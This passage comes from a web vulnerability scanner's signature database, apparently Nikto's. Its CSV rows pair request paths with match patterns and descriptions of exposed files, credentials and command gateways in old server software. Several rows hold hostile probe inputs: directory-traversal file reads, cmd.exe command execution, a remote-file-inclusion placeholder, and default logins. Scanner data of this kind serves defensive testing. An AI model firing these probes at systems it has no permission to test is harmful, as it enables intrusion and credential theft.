revealed.\",\"\",\"\"\n\"000274\",\"CVE-2002-1990\",\"3\",\"/examples/basic/servlet/HelloServlet\",\"GET\",\"BODY:The source of this servlet is in\",\"Caucho Resin reveals file system paths with a default servlet.\",\"\",\"\"\n\"000275\",\"CVE-2002-0463\",\"3\",\"/home.php?arsc_language=elvish\",\"GET\",\"BODY:Failed opening '\",\"ARSC Really Simple Chat can reveal file system paths if an invalid language name is specified.\",\"\",\"\"\n\"000276\",\"\",\"3e\",\"/hostadmin/?page='\",\"GET\",\"BODY:C:\\\\\\\\\",\"Host Admin reveals install location and other sensitive information.\",\"\",\"\"\n\"000277\",\"\",\"3e\",\"/hostadmin/?page='\",\"GET\",\"BODY:D:\\\\\\\\\",\"Host Admin reveals install location and other sensitive information.\",\"\",\"\"\n\"000278\",\"\",\"3\",\"/index.php?file=index.php\",\"GET\",\"BODY:Fatal error:\",\"PHP-Nuke 5.4 allows file system paths to be shown in error messages.\",\"\",\"\"\n\"000279\",\"CVE-2003-1535\",\"3\",\"/jgb_eng_php3/cfooter.php3\",\"GET\",\"BODY:Fatal error\",\"Justice Guestbook may reveal file system paths in error messages.\",\"\",\"\"\n\"000280\",\"\",\"3\",\"/@JUNK(5).csp\",\"GET\",\"BODY:File not found: \\/\",\"Invalid files with .csp extension reveal the file system path to the web root.\",\"\",\"\"\n\"000281\",\"\",\"3\",\"/modules.php?name=Downloads&d_op=viewdownload\",\"GET\",\"BODY:Failed opening\",\"PHP-Nuke allows file system paths to be revealed.\",\"\",\"\"\n\"000282\",\"\",\"3\",\"/modules.php?name=Downloads&d_op=viewdownload\",\"GET\",\"BODY:Fatal error\",\"PHP-Nuke allows file system paths to be revealed.\",\"\",\"\"\n\"000283\",\"\",\"3\",\"/modules.php?op=modload&name=0&file=0\",\"GET\",\"BODY:Failed opening\",\"PHP-Nuke is configured to give descriptive error messages that can reveal file system paths.\",\"\",\"\"\n\"000284\",\"\",\"3\",\"/modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=\",\"GET\",\"BODY:non\\-object in\",\"Postnuke v0.7.2.3-Phoenix and below reveal the file system path.\",\"\",\"\"\n\"000285\",\"\",\"3\",\"/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink\",\"GET\",\"BODY:Failed opening\",\"PHP-Nuke is configured to give descriptive error messages that can reveal file system paths.\",\"\",\"\"\n\"000286\",\"https://www.securityfocus.com/archive/1/332566\",\"3\",\"/path/nw/article.php?id='\",\"GET\",\"BODY:c:\\/&&BODY:d:\\/\",\"News Wizard 2.0 reveals the file system path.\",\"\",\"\"\n\"000288\",\"CVE-1999-0609\",\"3\",\"/pw/storemgr.pw\",\"GET\",\"CODE:200\",\"Encrypted ID/Pass for Mercantec's SoftCart.\",\"\",\"\"\n\"000289\",\"https://securitytracker.com/id/1003644\",\"3\",\"/rtm.log\",\"GET\",\"BODY:HttpPost Retry\",\"Rich Media's JustAddCommerce allows retrieval of a log file, which may contain sensitive information.\",\"\",\"\"\n\"000290\",\"https://www.exploit-db.com/exploits/22445\",\"3\",\"/scozbook/view.php?PG=whatever\",\"GET\",\"BODY:Warning:\\sSupplied\",\"ScozBook Beta 1.1 may reveal file system paths in error messages.\",\"\",\"\"\n\"000291\",\"\",\"3\",\"/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter\",\"GET\",\"CODE:200&&BODY:Error Occurred\",\"Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call.\",\"<!--#include virtual=\\\"/index.jsp\\\"-->\",\"\"\n\"000292\",\"\",\"3\",\"/shopa_sessionlist.asp\",\"GET\",\"CODE:200\",\"VP-ASP shopping cart test application is available from the web. This page may give the location of .mdb files which may also be available.\",\"\",\"\"\n\"000293\",\"https://www.webhostingtalk.nl/bugtraq-mailing-lijst/23898-simplebbs-1-0-6-default-permissions-vuln.html\",\"3\",\"/simplebbs/users/users.php\",\"GET\",\"CODE:200\",\"Simple BBS 1.0.6 allows user information and passwords to be viewed remotely.\",\"\",\"\"\n\"000294\",\"https://vulners.com/exploitdb/EDB-ID:22381\",\"3\",\"/sips/sipssys/users/a/admin/user\",\"GET\",\"BODY:Password&&CODE:200\",\"SIPS v0.2.2 allows user account info (including password) to be retrieved remotely.\",\"\",\"\"\n\"000295\",\"\",\"2\",\"/tcb/files/auth/r/root\",\"GET\",\"BODY:u_pwd\",\"HP-UX has the tcb auth file system on the web server.\",\"\",\"\"\n\"000296\",\"\",\"3\",\"@TYPO3typo3conf/\",\"GET\",\"CODE:200\",\"This may contain sensitive TYPO3 files.\",\"\",\"\"\n\"000297\",\"\",\"3\",\"@TYPO3typo3conf/database.sql\",\"GET\",\"CODE:200\",\"TYPO3 SQL file found.\",\"\",\"\"\n\"000298\",\"\",\"3\",\"@TYPO3typo3conf/localconf.php\",\"GET\",\"CODE:200\",\"TYPO3 config file found.\",\"\",\"\"\n\"000299\",\"https://www.securityfocus.com/bid/7186/info\",\"3\",\"/vchat/msg.txt\",\"GET\",\"CODE:200\",\"VChat allows user information to be retrieved.\",\"\",\"\"\n\"000300\",\"CVE-2003-0403\",\"3\",\"/vgn/license\",\"GET\",\"CODE:200\",\"Vignette server license file found.\",\"\",\"\"\n\"000301\",\"\",\"3\",\"/web.config\",\"GET\",\"BODY:<configuration>&&CODE:200\",\"ASP config file is accessible.\",\"\",\"\"\n\"000302\",\"https://www.php.net/manual/en/function.phpinfo.php\",\"3\",\"/webamil/test.php?mode=phpinfo\",\"GET\",\"BODY:PHP Version\",\"Horde allows phpinfo() to be run, which gives detailed system information.\",\"\",\"\"\n\"000303\",\"https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"3\",\"/webcart-lite/config/import.txt\",\"GET\",\"CODE:200\",\"This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.\",\"\",\"\"\n\"000304\",\"https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"3\",\"/webcart-lite/orders/import.txt\",\"GET\",\"CODE:200\",\"This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.\",\"\",\"\"\n\"000305\",\"https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"3\",\"/webcart/carts/\",\"GET\",\"CODE:200\",\"This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.\",\"\",\"\"\n\"000306\",\"https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"3\",\"/webcart/config/\",\"GET\",\"CODE:200\",\"This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.\",\"\",\"\"\n\"000307\",\"https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"3\",\"/webcart/config/clients.txt\",\"GET\",\"CODE:200\",\"This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.\",\"\",\"\"\n\"000308\",\"https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"3\",\"/webcart/orders/\",\"GET\",\"CODE:200\",\"This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.\",\"\",\"\"\n\"000309\",\"https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"3\",\"/webcart/orders/import.txt\",\"GET\",\"CODE:200\",\"This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.\",\"\",\"\"\n\"000310\",\"\",\"3\",\"/webmail/horde/test.php\",\"GET\",\"BODY:Horde Versions\",\"Horde script reveals detailed system/Horde information.\",\"\",\"\"\n\"000311\",\"\",\"3\",\"/whatever@JUNK(4).html\",\"GET\",\"BODY:InterScan HTTP Version\",\"InterScan VirusWall on the remote host reveals its version number in HTTP error messages.\",\"\",\"\"\n\"000312\",\"\",\"3\",\"/ws_ftp.ini\",\"GET\",\"CODE:200\",\"Can contain saved passwords for FTP sites\",\"\",\"\"\n\"000313\",\"\",\"3\",\"/WS_FTP.ini\",\"GET\",\"CODE:200\",\"Can contain saved passwords for FTP sites\",\"\",\"\"\n\"000315\",\"\",\"3\",\"/_mem_bin/auoconfig.asp\",\"GET\",\"CODE:200\",\"Displays the default AUO (LDAP) schema, including host and port.\",\"\",\"\"\n\"000316\",\"https://github.com/sullo/advisory-archives/blob/master/RFP2201.txt\",\"3\",\"/_mem_bin/auoconfig.asp\",\"GET\",\"BODY:LDAP\",\"LDAP information revealed via asp.\",\"\",\"\"\n\"000317\",\"https://vulners.com/osvdb/OSVDB:17664\",\"3\",\"/_mem_bin/remind.asp\",\"GET\",\"BODY:Recover&&CODE:200\",\"Page will give the password reminder for any user requested (username must be known).\",\"\",\"\"\n\"000318\",\"\",\"3\",\"/exchange/lib/ATTACH.INC\",\"GET\",\"BODY:File upload\",\"Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/\",\"\",\"\"\n\"000319\",\"https://vulners.com/osvdb/OSVDB:17659\",\"3\",\"/SiteServer/Admin/knowledge/persmbr/vs.asp\",\"GET\",\"CODE:200\",\"Expose various LDAP service and backend configuration parameters\",\"\",\"\"\n\"000320\",\"https://vulners.com/osvdb/OSVDB:17661\",\"3\",\"/SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp\",\"GET\",\"CODE:200\",\"Expose various LDAP service and backend configuration parameters\",\"\",\"\"\n\"000321\",\"https://vulners.com/osvdb/OSVDB:17662\",\"3\",\"/SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp\",\"GET\",\"CODE:200\",\"Expose various LDAP service and backend configuration parameters\",\"\",\"\"\n\"000322\",\"https://vulners.com/osvdb/OSVDB:17660\",\"3\",\"/SiteServer/Admin/knowledge/persmbr/VsTmPr.asp\",\"GET\",\"CODE:200\",\"Expose various LDAP service and backend configuration parameters\",\"\",\"\"\n\"000323\",\"\",\"3\",\"/trace.axd\",\"GET\",\"BODY:Application Trace\",\"The .NET IIS server has application tracing enabled. This could allow an attacker to view the last 50 web requests.\",\"\",\"\"\n\"000324\",\"\",\"3\",\"/tvcs/getservers.exe?action=selects1\",\"GET\",\"CODE:200\",\"Following steps 2-4 of this page may reveal a zip file that contains passwords and system details.\",\"\",\"\"\n\"000325\",\"MS02-018\",\"3\",\"/whatever.htr\",\"GET\",\"BODY:<html>Error: The requested file could not be found\\. <\\/html>\",\"May reveal physical path. htr files may also be vulnerable to an off-by-one overflow that allows remote command execution.\",\"\",\"\"\n\"000327\",\"\",\"3\",\"/./\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Appending '/./' to a directory allows indexing\",\"\",\"\"\n\"000328\",\"\",\"3\",\"/nsn/fdir.bas:ShowVolume\",\"GET\",\"CODE:200\",\"You can use ShowVolume and ShowDirectory directly on the Novell server (NW5.1) to view the filesystem without having to log in\",\"\",\"\"\n\"000329\",\"\",\"3\",\"/nsn/fdir.bas\",\"GET\",\"BODY:FDIR\\sv1\",\"You can use fdir to ShowVolume and ShowDirectory.\",\"\",\"\"\n\"000330\",\"\",\"3\",\"/servlet/webacc?User.html=noexist\",\"GET\",\"BODY:templates\\/&&!CODE:404\",\"Netware web access may reveal full path of the web server. Apply vendor patch or upgrade.\",\"\",\"\"\n\"000331\",\"\",\"4\",\"/forum/admin/database/wwForum.mdb\",\"GET\",\"CODE:200\",\"Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein\",\"\",\"\"\n\"000332\",\"\",\"4\",\"/webmail/blank.html\",\"GET\",\"CODE:200\",\"IlohaMail 0.8.10 contains an XSS vulnerability. Previous versions contain other non-descript vulnerabilities.\",\"\",\"\"\n\"000333\",\"\",\"5\",\"/jamdb/\",\"GET\",\"CODE:200\",\"JamDB pre 0.9.2 mp3.php and image.php can allow user to read arbitrary file out of docroot.\",\"\",\"\"\n\"000334\",\"CVE-2000-0063\",\"6\",\"/cgi/cgiproc?\",\"GET\",\"CODE:200\",\"It may be possible to crash Nortel Contivity VxWorks by requesting '/cgi/cgiproc?$' (not attempted!). Upgrade to version 2.60 or later.\",\"\",\"\"\n\"000335\",\"\",\"7\",\"@CGIDIRSaddbanner.cgi\",\"GET\",\"CODE:200\",\"This CGI may allow attackers to read any file on the system.\",\"\",\"\"\n\"000336\",\"CVE-2002-0934\",\"7\",\"@CGIDIRSaf.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.@LFI(abs,url,nix)\",\"GET\",\"CODE:200&&LFI()\",\"AlienForm2 revision 1.5 allows any file to be read from the remote system.\",\"\",\"\"\n\"000337\",\"\",\"7\",\"@CGIDIRSalienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.@LFI(abs,url,nix)\",\"GET\",\"CODE:200&&LFI()\",\"AlienForm2 revision 1.5 allows any file to be read from the remote system.\",\"\",\"\"\n\"000338\",\"\",\"7\",\"@CGIDIRSshtml.dll\",\"GET\",\"CODE:200\",\"This may allow attackers to retrieve document source.\",\"\",\"\"\n\"000339\",\"CVE-2003-0676\",\"7\",\"/admin-serv/tasks/configuration/ViewLog?file=hosts&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv\",\"GET\",\"@LFI()\",\"iPlanet Administration Server 5.1 allows remote users to download any file from the server. Upgrade to SunOne DS5.2 and in iDS5.1 SP2 Hotfix 2.\",\"\",\"\"\n\"000340\",\"\",\"8\",\"@CGIDIRSaglimpse.cgi\",\"GET\",\"CODE:200\",\"This CGI may allow attackers to execute remote commands.\",\"\",\"\"\n\"000341\",\"\",\"8\",\"@CGIDIRSaglimpse\",\"GET\",\"CODE:200\",\"This CGI may allow attackers to execute remote commands.\",\"\",\"\"\n\"000342\",\"\",\"8\",\"@CGIDIRSarchitext_query.cgi\",\"GET\",\"CODE:200\",\"Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.\",\"\",\"\"\n\"000343\",\"\",\"8\",\"@CGIDIRScgiemail-1.4/cgicso?query=AAA\",\"GET\",\"BODY:400 Required field missing: fingerhost\",\"This CGI allows attackers to execute remote commands.\",\"\",\"\"\n\"000344\",\"\",\"8\",\"/cgi-local/cgiemail-1.6/cgicso?query=AAA\",\"GET\",\"BODY:400 Required field missing: fingerhost\",\"This CGI allows attackers to execute remote commands.\",\"\",\"\"\n\"000345\",\"CVE-2003-0104\",\"8\",\"/servlet/SchedulerTransfer\",\"GET\",\"CODE:200&&BODY:Error Occurred\",\"PeopleSoft SchedulerTransfer servlet found, which may allow remote command execution.\",\"\",\"\"\n\"000346\",\"\",\"8\",\"/servlet/sunexamples.BBoardServlet\",\"GET\",\"CODE:200&&BODY:Error Occurred\",\"This default servlet lets attackers execute arbitrary commands.\",\"\",\"\"\n\"000347\",\"CVE-2003-0104\",\"8\",\"/servlets/SchedulerTransfer\",\"GET\",\"CODE:200&&BODY:Error Occurred\",\"PeopleSoft SchedulerTransfer servlet found, which may allow remote command execution.\",\"\",\"\"\n\"000348\",\"\",\"8\",\"@CGIDIRScmd.exe?/c+dir\",\"GET\",\"CODE:200\",\"cmd.exe can execute arbitrary commands\",\"\",\"\"\n\"000349\",\"\",\"8\",\"@CGIDIRScmd1.exe?/c+dir\",\"GET\",\"CODE:200\",\"cmd1.exe can execute arbitrary commands\",\"\",\"\"\n\"000350\",\"\",\"8\",\"@CGIDIRShello.bat?&dir+c:\\\\\",\"GET\",\"CODE:200\",\"This batch file may allow attackers to execute remote commands.\",\"\",\"\"\n\"000351\",\"\",\"8\",\"@CGIDIRSpost32.exe|dir%20c:\\\\\",\"GET\",\"CODE:200\",\"post32 can execute arbitrary commands\",\"\",\"\"\n\"000352\",\"CVE-2002-1436\",\"8\",\"/perl/-e%20print%20Hello\",\"GET\",\"CODE:200\",\"The Perl interpreter on the Novell system may allow any command to be executed.\",\"\",\"\"\n\"000353\",\"\",\"ae\",\"/admin.cgi\",\"GET\",\"BODY:Administration\",\"InterScan VirusWall administration is accessible without authentication.\",\"\",\"\"\n\"000354\",\"\",\"ae\",\"/interscan/\",\"GET\",\"BODY:Administration\",\"InterScan VirusWall administration is accessible without authentication.\",\"\",\"\"\n\"000355\",\"\",\"a\",\"/vgn/legacy/save\",\"GET\",\"CODE:200\",\"Vignette Legacy Tool may be unprotected. To access this resource, set a cookie called 'vgn_creds' with any value.\",\"\",\"\"\n\"000356\",\"\",\"b\",\"/\",\"GET\",\"BODY:default Tomcat\",\"Appears to be a default Apache Tomcat install.\",\"\",\"\"\n\"000357\",\"\",\"b\",\"/IDSWebApp/IDSjsp/Login.jsp\",\"GET\",\"CODE:200\",\"Tivoli Directory Server Web Administration.\",\"\",\"\"\n\"000358\",\"CVE-1999-0607\",\"b\",\"/quikstore.cfg\",\"GET\",\"CODE:200\",\"Shopping cart config file, http://www.quikstore.com/, http://www.mindsec.com/advisories/post2.txt\",\"\",\"\"\n\"000359\",\"\",\"b\",\"/quikstore.cgi\",\"GET\",\"CODE:200\",\"A shopping cart.\",\"\",\"\"\n\"000360\",\"\",\"b\",\"/securecontrolpanel/\",\"GET\",\"CODE:200\",\"Web Server Control Panel\",\"\",\"\"\n\"000361\",\"\",\"b\",\"/siteminder\",\"GET\",\"CODE:200\",\"This may be an indication that the server is running Siteminder for SSO\",\"\",\"\"\n\"000362\",\"\",\"b\",\"/webmail/\",\"GET\",\"CODE:200\",\"Web based mail package installed.\",\"\",\"\"\n\"000363\",\"\",\"b\",\"/Xcelerate/LoginPage.html\",\"GET\",\"BODY:Xcelerate Login Page\",\"Xcelerate Content Server by Divine/OpenMarket login page found.\",\"\",\"\"\n\"000364\",\"\",\"b\",\"/_cti_pvt/\",\"GET\",\"CODE:200\",\"FrontPage directory found.\",\"\",\"\"\n\"000365\",\"\",\"b\",\"/smg_Smxcfg30.exe?vcc=3560121183d3\",\"GET\",\"CODE:200\",\"This may be a Trend Micro Officescan 'backdoor'.\",\"\",\"\"\n\"000366\",\"\",\"2b\",\"/examples/servlets/index.html\",\"GET\",\"BODY:Servlet Examples\",\"Apache Tomcat default JSP pages present.\",\"\",\"\"\n\"000367\",\"\",\"3b\",\"/nsn/..%5Cutil/attrib.bas\",\"GET\",\"CODE:200\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.\",\"\",\"\"\n\"000368\",\"\",\"3b\",\"/nsn/..%5Cutil/chkvol.bas\",\"GET\",\"CODE:200\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.\",\"\",\"\"\n\"000369\",\"\",\"3b\",\"/nsn/..%5Cutil/copy.bas\",\"GET\",\"CODE:200\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.\",\"\",\"\"\n\"000370\",\"\",\"3b\",\"/nsn/..%5Cutil/del.bas\",\"GET\",\"CODE:200\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.\",\"\",\"\"\n\"000371\",\"\",\"3b\",\"/nsn/..%5Cutil/dir.bas\",\"GET\",\"CODE:200\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.\",\"\",\"\"\n\"000372\",\"\",\"3b\",\"/nsn/..%5Cutil/dsbrowse.bas\",\"GET\",\"CODE:200\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.\",\"\",\"\"\n\"000373\",\"\",\"3b\",\"/nsn/..%5Cutil/glist.bas\",\"GET\",\"CODE:200\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.\",\"\",\"\"\n\"000374\",\"\",\"3b\",\"/nsn/..%5Cutil/lancard.bas\",\"GET\",\"CODE:200\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.\",\"\",\"\"\n\"000375\",\"\",\"3b\",\"/nsn/..%5Cutil/md.bas\",\"GET\",\"CODE:200\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.\",\"\",\"\"\n\"000376\",\"\",\"3b\",\"/nsn/..%5Cutil/rd.bas\",\"GET\",\"CODE:200\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.\",\"\",\"\"\n\"000377\",\"\",\"3b\",\"/nsn/..%5Cutil/ren.bas\",\"GET\",\"CODE:200\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.\",\"\",\"\"\n\"000378\",\"\",\"3b\",\"/nsn/..%5Cutil/send.bas\",\"GET\",\"CODE:200\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.\",\"\",\"\"\n\"000379\",\"\",\"3b\",\"/nsn/..%5Cutil/set.bas\",\"GET\",\"CODE:200\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.\",\"\",\"\"\n\"000380\",\"\",\"3b\",\"/nsn/..%5Cutil/slist.bas\",\"GET\",\"CODE:200\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.\",\"\",\"\"\n\"000381\",\"\",\"3b\",\"/nsn/..%5Cutil/type.bas\",\"GET\",\"CODE:200\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.\",\"\",\"\"\n\"000382\",\"\",\"3b\",\"/nsn/..%5Cutil/userlist.bas\",\"GET\",\"CODE:200\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.\",\"\",\"\"\n\"000383\",\"\",\"3b\",\"/nsn/..%5Cweb/env.bas\",\"GET\",\"CODE:200\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.\",\"\",\"\"\n\"000384\",\"\",\"3b\",\"/nsn/..%5Cweb/fdir.bas\",\"GET\",\"CODE:200\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.\",\"\",\"\"\n\"000385\",\"\",\"3b\",\"/nsn/..%5Cwebdemo/env.bas\",\"GET\",\"CODE:200\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.\",\"\",\"\"\n\"000386\",\"\",\"3b\",\"/nsn/..%5Cwebdemo/fdir.bas\",\"GET\",\"CODE:200\",\"Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server.\",\"\",\"\"\n\"000387\",\"CVE-2002-2106\",\"c\",\"/wikihome/action/conflict.php?TemplateDir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Some versions of WikkiTikkiTavi allow external source to be included.\",\"\",\"\"\n\"000388\",\"\",\"1\",\"@CGIDIRSarchie\",\"GET\",\"CODE:200\",\"Gateway to the unix command, may be able to submit extra commands\",\"\",\"\"\n\"000389\",\"\",\"1\",\"@CGIDIRScalendar.pl\",\"GET\",\"CODE:200\",\"Gateway to the unix command, may be able to submit extra commands\",\"\",\"\"\n\"000390\",\"\",\"1\",\"@CGIDIRScalendar\",\"GET\",\"CODE:200\",\"Gateway to the unix command, may be able to submit extra commands\",\"\",\"\"\n\"000391\",\"\",\"1\",\"@CGIDIRSdate\",\"GET\",\"CODE:200\",\"Gateway to the unix command, may be able to submit extra commands\",\"\",\"\"\n\"000392\",\"\",\"1\",\"@CGIDIRSfortune\",\"GET\",\"CODE:200\",\"Gateway to the unix command, may be able to submit extra commands\",\"\",\"\"\n\"000393\",\"\",\"1\",\"@CGIDIRSredirect\",\"GET\",\"CODE:200\",\"Redirects via URL from form\",\"\",\"\"\n\"000394\",\"\",\"1\",\"@CGIDIRSuptime\",\"GET\",\"CODE:200\",\"Gateway to the unix command, may be able to submit extra commands\",\"\",\"\"\n\"000395\",\"\",\"1\",\"@CGIDIRSwais.pl\",\"GET\",\"CODE:200\",\"Gateway to the unix command, may be able to submit extra commands\",\"\",\"\"\n\"000396\",\"\",\"2\",\"//\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page.\",\"\",\"\"\n\"000397\",\"\",\"2\",\"/webtop/wdk/\",\"GET\",\"BODY:Directory Listing for \\/wdk\\/\",\"Documentum Webtop Server appears to be installed\",\"\",\"\"\n\"000398\",\"https://web.archive.org/web/20011226154728/http://archives.neohapsis.com/archives/sf/pentest/2000-11/0147.html\",\"2\",\"/SilverStream\",\"GET\",\"BODY:title>.*SilverStream.*<\\/title\",\"SilverStream allows directory listing\",\"\",\"\"\n\"000399\",\"\",\"2e\",\"/signon\",\"GET\",\"BODY:Administrator Login\",\"Tivoli administrator login found. Test the default login of admin/admin. Tivoli allows system administration.\",\"\",\"\"\n\"000400\",\"\",\"2\",\"/upd/\",\"GET\",\"CODE:200\",\"WASD Server can allow directory listings by requesting /upd/directory/. Upgrade to a later version and secure according to the documents on the WASD web site.\",\"\",\"\"\n\"000401\",\"\",\"3\",\"/examples/jsp/source.jsp??\",\"GET\",\"BODY:Directory Listing\",\"Tomcat 3.23/3.24 allows directory listings by performing a malformed request to a default jsp. Default pages should be removed.\",\"\",\"\"\n\"000402\",\"CVE-2002-2008\",\"3\",\"/lpt9\",\"GET\",\"BODY:FileNotFoundException:\",\"Apache Tomcat 4.0.3 reveals the web root when requesting a non-existent DOS device. Upgrade to version 4.1.3beta or higher.\",\"\",\"\"\n\"000403\",\"https://www.exploit-db.com/exploits/19712\",\"3\",\"/cfcache.map\",\"GET\",\"BODY:Mapping=&&BODY:SourceTimeStamp\",\"May leak directory listing, may also leave server open to a DOS.\",\"\",\"\"\n\"000404\",\"https://www.exploit-db.com/exploits/19712\",\"3\",\"/cfdocs/cfcache.map\",\"GET\",\"BODY:Mapping=&&BODY:SourceTimeStamp\",\"May leak directory listing, may also leave server open to a DOS.\",\"\",\"\"\n\"000405\",\"\",\"3\",\"/CVS/Entries\",\"GET\",\"CODE:200\",\"CVS Entries file may contain directory listing information.\",\"\",\"\"\n\"000406\",\"\",\"3\",\"/lpt9.xtp\",\"GET\",\"BODY:java\\.io\\.FileNotFoundException:\",\"Resin 2.1 and Tomcat servers reveal the server path when a DOS device is requested.\",\"\",\"\"\n\"000408\",\"https://seclists.org/fulldisclosure/2003/Jun/536\",\"37\",\"@PHPMYADMINdb_details_importdocsql.php?submit_show=true&do=import&docpath=../\",\"GET\",\"BODY:Ignoring file  \\.<\\/font><\\/p>\",\"phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher.\",\"\",\"\"\n\"000409\",\"\",\"3\",\"/asp/sqlqhit.asp\",\"GET\",\"BODY:CHARACTERIZATION\",\"This sample ASP allows anyone to retrieve directory listings.\",\"\",\"\"\n\"000410\",\"\",\"3\",\"/asp/SQLQHit.asp\",\"GET\",\"BODY:CHARACTERIZATION\",\"This sample ASP allows anyone to retrieve directory listings.\",\"\",\"\"\n\"000411\",\"\",\"3\",\"/iissamples/issamples/sqlqhit.asp\",\"GET\",\"BODY:CHARACTERIZATION\",\"This sample ASP allows anyone to retrieve directory listings.\",\"\",\"\"\n\"000412\",\"\",\"3\",\"/iissamples/issamples/SQLQHit.asp\",\"GET\",\"BODY:CHARACTERIZATION\",\"This sample ASP allows anyone to retrieve directory listings.\",\"\",\"\"\n\"000413\",\"\",\"3\",\"/ISSamples/sqlqhit.asp\",\"GET\",\"BODY:CHARACTERIZATION\",\"This sample ASP allows anyone to retrieve directory listings.\",\"\",\"\"\n\"000414\",\"\",\"3\",\"/ISSamples/SQLQHit.asp\",\"GET\",\"BODY:CHARACTERIZATION\",\"This sample ASP allows anyone to retrieve directory listings.\",\"\",\"\"\n\"000415\",\"\",\"3\",\"/@JUNK(5).aspx\",\"GET\",\"BODY:NET Framework Version:&&BODY:\\[FileNotFoundException\\]:\",\"ASP.NET reveals its version in invalid .aspx error messages.\",\"\",\"\"\n\"000416\",\"\",\"3\",\"/oc/Search/sqlqhit.asp\",\"GET\",\"BODY:CHARACTERIZATION\",\"This sample ASP allows anyone to retrieve directory listings.\",\"\",\"\"\n\"000417\",\"\",\"3\",\"/oc/Search/SQLQHit.asp\",\"GET\",\"BODY:CHARACTERIZATION\",\"This sample ASP allows anyone to retrieve directory listings.\",\"\",\"\"\n\"000418\",\"\",\"3\",\"/search/htx/sqlqhit.asp\",\"GET\",\"BODY:CHARACTERIZATION\",\"This sample ASP allows anyone to retrieve directory listings.\",\"\",\"\"\n\"000419\",\"\",\"3\",\"/search/htx/SQLQHit.asp\",\"GET\",\"BODY:CHARACTERIZATION\",\"This sample ASP allows anyone to retrieve directory listings.\",\"\",\"\"\n\"000420\",\"\",\"3\",\"/search/sqlqhit.asp\",\"GET\",\"BODY:CHARACTERIZATION\",\"This sample ASP allows anyone to retrieve directory listings.\",\"\",\"\"\n\"000421\",\"\",\"3\",\"/search/SQLQHit.asp\",\"GET\",\"BODY:CHARACTERIZATION\",\"This sample ASP allows anyone to retrieve directory listings.\",\"\",\"\"\n\"000422\",\"\",\"3\",\"/sqlqhit.asp\",\"GET\",\"BODY:CHARACTERIZATION\",\"This sample ASP allows anyone to retrieve directory listings.\",\"\",\"\"\n\"000423\",\"\",\"3\",\"/SQLQHit.asp\",\"GET\",\"BODY:CHARACTERIZATION\",\"This sample ASP allows anyone to retrieve directory listings.\",\"\",\"\"\n\"000424\",\"CVE-2002-0407\",\"3\",\"@CGIDIRScom5..........................................................................................................................................................................................................................box\",\"GET\",\"BODY:Execution of Perl script\",\"Lotus reveals file system paths when requesting DOS devices with bad syntax.\",\"\",\"\"\n\"000425\",\"CVE-2002-0407\",\"3\",\"@CGIDIRScom5.java\",\"GET\",\"BODY:Execution of\",\"Lotus reveals 